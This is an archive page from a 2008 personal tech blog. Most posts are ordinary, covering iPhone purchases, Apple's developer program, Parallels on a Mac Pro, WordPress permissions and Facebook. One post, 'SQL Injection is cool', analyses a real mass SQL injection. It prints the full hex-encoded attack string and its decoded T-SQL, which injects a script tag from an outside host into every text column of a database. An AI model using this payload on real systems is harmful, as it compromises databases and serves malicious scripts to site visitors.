Archive for the 'soul' Category

Go for your whims.

September 2nd, 2008

In my post-TPR (The Princeton Review) - trying to figure out what I want to do state of mind I decided to do something a little different.  All of us get whims and in most cases, at least with myself, I tend to be all talk.  Lately, with a sort of "nothing to lose" attititude I decided to attempt to follow through with some of my whims.  One of these whims stemmed from my fan-boy status of a particular tech celebrity Leo Laporte.  I have been listening to his podcasts for years and watched him on TechTV before they went caput.  I have always admired him and been amazed by his overall knowledge of not only the history of technology but all things new and cool. 

 

So here is the beginning of the story.  I sent Leo a simple email volunteering my time for a week, where I would fly out to Petaluma and intern for him.  I truly didn’t care what I did for him.  Be it washing his car, making coffee or something more useful like help with his websites. 

 

To mitigate my barrier to entry I told him I would pay for all my own expenses.  A couple weeks later I got a message back from Mara, Leo’s email person.  She told me that she would pass my email over to Leo.  To be clear she told me that he reads all of his email eventually.  To my huge delight, I was soon contacted by Leo who extended the invitation to visit him. 

 

I am planning on going to Petaluma on Sept. 15-18. 

 

Let’s hear if for our whims.  More to come…

 

 

Posted by Barry | Filed in network, soul | Comment now »

 

Parallels, full screen and multiple monitors - No worky

August 28th, 2008

 

This is just another tidbit of info that I have come across through my adventures with Parallels support.  In my venture to fully utilize my new baby (Mac Pro beast) I really wanted to be able to take advantage of my three monitors.  Unfortunately, it turns out that Parallels doesnt support multiple monitors in full screen mode.  It does seem able to utilize multiple monitors when using coherence (able to drag application to another monitor), however that isn’t how I roll.  I have been informed from Parallels support that this will be "fixed" in an upcoming version. 

 

A word about Parallels support.  If you are willing to pay to get your simple question answered they are quite helpful and the process is straightforward and fast.  If you take the free route, expect it to take a week.  That said - I got my answer.

 

Posted by Barry | Filed in soul | Comment now »

 

WordPress Persmissions - what should they be? Really!

August 25th, 2008

I am coming to the quick realization that some Wordpress (2.6) features, some that I am very used to, others that are new to 2.6, won’t work if the permissions on directories and files aren’t set correctly.  After some lengthy Googling, what "correct" is seems to be anyones guess based on what OS, webserver, WP version, plugin or theme you happen to be running.

 

So here is my question:

 

What should the permissions be on every directory and file within a Wordpress 2.6 installation be for the application to work as intended?

 

I would really like to hear from everyone - the community at large as well as those close to the Wordpress development.  But at the end of the day, I would appreciate hearing from an official source.

 

Update: I got some feedback…wordpress.org/support/topic/199164

 

Posted by Barry | Filed in soul | Comment now »

 

Mac Pro, Parallels, Blue Screen of Death - nuff said

August 6th, 2008

 

Just a quick post so that this information gets out into the interweb some how.  It cost me $30 but I am willing to share this info for free since Parallels isn’t. 

 

Now this could be my own ignorance but I had a problem and it just wasnt obvious to me what was causing it. 

 

I have a new Mac, installed Parallels with Vista Ultimate (bootcamp partition).  Was working sweet!  Not surprisingly, after a while the VM would pause due to lack of activity.  Upon Resume, Vista would blue screen.  I found many references to this problem when I googled it, but no good solutions.

 

So I ended up emailing Parallels support a couple times to no avail.  I got no response; really don’t believe their system works.  I then called Parallels phone support and paying my money.

 

Turns out - DOH - that it was Vista that was going to sleep first (power settings) which was causing the VM to Pause.  After changing my settings to not sleep or hibernate -> all is well. 

 

The Blue Screen is still a bug they need to fix, but I can live with this solution.  Also if you want things to sleep do it through the Mac side.

 

 

 

Posted by Barry | Filed in soul | Comment now »

 

iPhone Take 2

July 16th, 2008

 

So here we go again.  I am going to give it one more try.  But I am glad to say things are looking up.  I managed to acquire the new device yesterday after a long grueling day on line in the hot sun.  See my Twitter for the play by play.  I ended up having a huge argument over the phone with AT&T customer service in the middle of the Apple Store.  From my other posts on this blog the story goes something like this.  I bought the old iPhone, transferred my service to AT&T from Verizon, then when the 3G was announced (rumored) I went back to the AT&T store to figure out the best way to get on the new phone.  I ended up returning the iPhone, getting this little crappy, free, refurbished Nokia to hold me over.  I was going to go back to Verizon but the sales people assured me that everything would work out and that I should stay with AT&T.  Unt I did. 

 

Turns out I was NOT eligible for the incentive price on the new iPhone and that’s where the argument started.  Of course back then we had no idea what type of pricing models or incentives AT&T would offer - but that’s not the point.  In the end, I wound up buying the new iPhone from the Apple Store because pretty much everyone else in the NJ/NY area was sold out and I was being told that they wouldnt be replenished for 20+ days.  Even the Apple Store’s assistant manager got on the phone with AT&T Customer Service to make my case.  Really, they made the wrong decision and unless something changes I will feel pretty screwed.  BUT, I am holding my judgement.  This morning I went back to the original AT&T store to allow them to make things right.  Manager wasn’t there so the jury is out.  So we’ll see.

I have only used the phone for a few hours but so far I have really enjoyed the experience.  Very clean, fast and predictable.  Few bullets:

  • The sound quality seems better. 
  • The phone is still pretty peppy but I am seeing a drag when multiple things are going on
  • 3G is very noticable and the Wifi seems faster too
  • The iTunes upgrade went nicely and the phone synched perfectly.  I still dont understand why iTunes makes you authorize the computer you are use to download stuff.  Had to do that for the apps to synch.
  • Besides for the authorization issue (2 mins to solve) the apps synched perfectly
  • I havent hooked up the email yet so I have no idea if the "push" is working yet.  Loved Apple’s note today.  "We really didn’t mean push"

 

On another good note I was finally approved for the developer program.  I can now write applications AND put them on the phone.  I haven’t tried it yet, but I am looking forward to it.

 

 

 

Posted by Barry | Filed in soul | Comment now »

 

The MacArthur Manifesto

July 1st, 2008

MacArthur Manifesto

 

While recently listening to an edition of the Net@Night podcast, Amber MacArthur introduced a new segment of the show called Beef of the Week.  She explained that she has basically been shutout of her Facebook account for months now.  Turns out that she has too many friend requests and the Facebook platform cannot handle it.  She is prevented from logging in and accepting the thousands of friends requests she has received.  When she reached out to Facebook their answer was basically that there was nothing they could do and that she might try deleting all of the people that were attempting to befriend her.  Not very social.  Now Amber is kind of a Social Network poster child in that she dedicates most of her time promoting social media and networking and believes that the web is the best place to form communities.  Seems to me that building their platform for and supporting users like Amber is in Facebook’s own best interest.

We use social networks like Facebook for many reasons.  Most people use it as a place where they can keep up with their friends no matter where they are.  But we are also seeing more and more groups being formed that relate to causes and charities.  These are very important communities and networks like Facebook become more relevant as they host and support them.  I spend a good part of my day thinking about how to promote organized social networks.  The questions I ask myself include what tools or mechanisms are best for a particular social network.  This typically boils down to a feature set and target demographic.  NOW I am thinking I have to also consider if the platform can handle the load. 

Should I create social networks on Facebook knowing they may not be able to handle it if it becomes popular?

User loyalty of Social Network websites has proven over time to be fickle.  For the most part users go where their friends are.  However, as we have seen in the past - my friends used to be at MySpace and now they are at Facebook.  In a couple months they could be somewhere else.  My main point is that if Facebook as a platform cant handle the vast numbers of people who flock to these types of communities they will fail and the users will go someplace else.

The Mission: To use Facebook against themselves.  We must convince Facebook to fix their platform and to support people like Amber so we can continue to build important social communities.  Maybe we should create a "Free Amber" Facebook Fan page.

 

 

Posted by Barry | Filed in network, soul | Comment now »

 

Returned meself an iPhone!

April 23rd, 2008

Yup, had enough.  So three major reasons:

 

  1. Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment.  (See my other posts on the subject)
  2. New 3G iPhone is strongly rumored to be coming out in the summer
  3. Email is just painful.  Yahoo push mail is a joke.  I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE.  My hope is that the 3G iPhone will have a chance of having productive like email capabilities.

My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then come this summer upgrade to a new iPhone 2.0 with 3G.  The rumors are also that the developer program will open up after the SDK is officially released.
 

My appreciation to the ATT store at 78th and Broadway for being so nice and understanding. 

 

Posted by Barry | Filed in soul | Comment now »

 

Apple: iPhone Developer Program on Hold. Barry: You Mother @#*)%$’s

April 22nd, 2008

Sorry, but I am still steamed over the whole Developer program.  Needed just one more rant about it…

Well, talk about taking the wind of out your sails. 

Watch the momentum grow:

  1. I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
  2. Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
  3. Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
  4. Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
  5. Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
  6. Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
  7. Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
  8. Switch the target from simulator to device - What does it mean "provision"?

 

So until they open back up the Developer program which is another friggin $100 I am more than willing to pay, I cant "provision" my friggin iPhone.

 

OY.  Maybe the chicks will dig the simulator?  Hold on while I compile….

 

More info: 

http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/

http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/

http://twitter.com/danielpunkass/statuses/771541151

http://twitter.com/davidweiss/statuses/771549002

http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/

 

 

Posted by Barry | Filed in soul, via | Comment now »

 

Got meself an iPhone

April 18th, 2008

So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that.  Apple SDKBut it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought mYself an iPhone. 

 

According to Mossberg that was probably a mistake and probably a bigger one than I realized.  He thinks the 3G version is coming out in June.  My bad was that I didnt realize it but in order to actually install the programs you write with the sdk on to your device it needs to be "provisioned".  Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this.  Anyway, I cant get provisioned until I am accepted into the developer program and pay my $99.  And at the moment they are not accepting applications:

 

Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.

I hope to keep writing about my experience, but for now.  See ya.
 

 

 

Posted by Barry | Filed in soul | Comment now »

 

SQL Injection is cool

April 18th, 2008

Overview

So seeing sites hacked is pretty cool unless it’s one of yours.  I kinda look at hacking as the end-all-be-all of elite programming.  Of course, the intent isn’t always good, but the techniques are artful.  I most recently witnessed an impressive SQL Injection hack on a website.  I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently.  Of course anyone who has been hacked by this code will recognize these numbers.  As far as SQL Injection attacks go this one seems to have taken a similar systematic approach.  I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that.  I will list some references at the end.

The Details

There were a couple things that impressed me about this particular hack.

  1. The outcome was that the hack code inserted a <script> tag with a reference url into every varchar column in the database.  The site was running .Net, IIS with SQL Server 2000.  I mention the technology because the script assumes SQL Server.  That said, don’t fool yourself to think that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices.  Specifically inline or free SQL statements within code and could occur on any (most) platform, language or database.  The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve.  It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
  2. The second thing that impressed me was the actual code that executed this varchar manipulation.  It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
The Possibilities

The possibilities of this hack scare me (and impress me).  When I started searching around the web for this 414151 script I found a good number of references.  Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also.  I list one link below of an article that talks about it quite a lot.  According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.

It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.

The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
The SQL Statement

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor 

CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b 

where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or 

b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM 

 Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN 

exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+

”<script src=http://www.414151.com/fjp.js></script>”’)FETCH NEXT 

FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor
Other references

Update (4/29)…

This one keeps going and going.

I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks.  I didn’t mention this earlier because this is inherent in all SQL Injection attacks.

 

Posted by Barry | Filed in soul | Comment now »

 
Next Page »

Design by MIF Design Studio and tweaked by BigB |
Brought by Consolidate Debt |